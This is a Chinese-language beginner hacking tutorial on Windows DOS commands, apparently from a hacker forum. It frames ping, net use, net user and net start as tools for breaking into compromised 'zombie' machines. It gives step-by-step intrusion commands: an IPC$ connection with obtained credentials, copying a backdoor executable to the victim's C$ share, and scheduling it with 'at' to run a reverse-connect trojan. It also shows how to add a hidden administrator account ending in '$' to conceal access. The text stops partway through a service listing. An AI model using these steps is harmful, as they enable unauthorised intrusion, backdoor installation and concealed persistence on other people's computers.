菜鸟入门版-DOS命令之二
它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:
C:\>type c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect
看出来没有?,我用的是XP系统.
这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.
ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
ping ip
ping 网址
下面P的是本站:
C:\>ping www.hf110.com
Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms
上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.
net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接
net use \\肉鸡ip\ipc$ "密码" /user:"用户名"
连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).
copy D:\systems.exe \\肉鸡ip\c$ //这里它要开放共享,你才能上传.否则无法上传成功.
net time \\肉鸡ip //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10
at \\肉鸡ip 15:12 systems.exe //在15:12分,运行systems.exe
在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.
net user
查看用户或新建一个用户.
这是在我电脑上的截图
C:\>net user
\\BILLGATES 的用户帐户
---------------------------------------------------------------------
Guest guest1 HelpAssistant
SUPPORT_388945a0 yhkj
命令成功完成。
C:\>
上面是我所有的用户.
现在我新建一个setwell的用户,密码是123456, 截图如下
C:\>net user setwell 123456 /add
命令成功完成。
C:\>net localgroup administrators setwell /add //这条命令是加setwell为管理员
命令成功完成。
接下来我们再net user ,载图如下
C:\>net user
\\BILLGATES 的用户帐户
----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:
C:\>net user set$ 123456 /add
命令成功完成。
C:\>net localgroup administrators set$ /add
命令成功完成。
C:\>net user
\\BILLGATES 的用户帐户
-----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
C:\>
看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:
C:\>net localgroup administrators
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。
C:\>
看到没有,我们看到set$这个用户了.
如果要删除用户用这个命令:
C:\>net user setwell /delete
net start
1.启动某些服务
比如: net start telnet //启动telnet服务
2.查看当前启动了什么服务.看看我的电脑启动了什么服务:
C:\>net start
已经启动以下 Windows 服务:
Automatic Updates
COM Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger
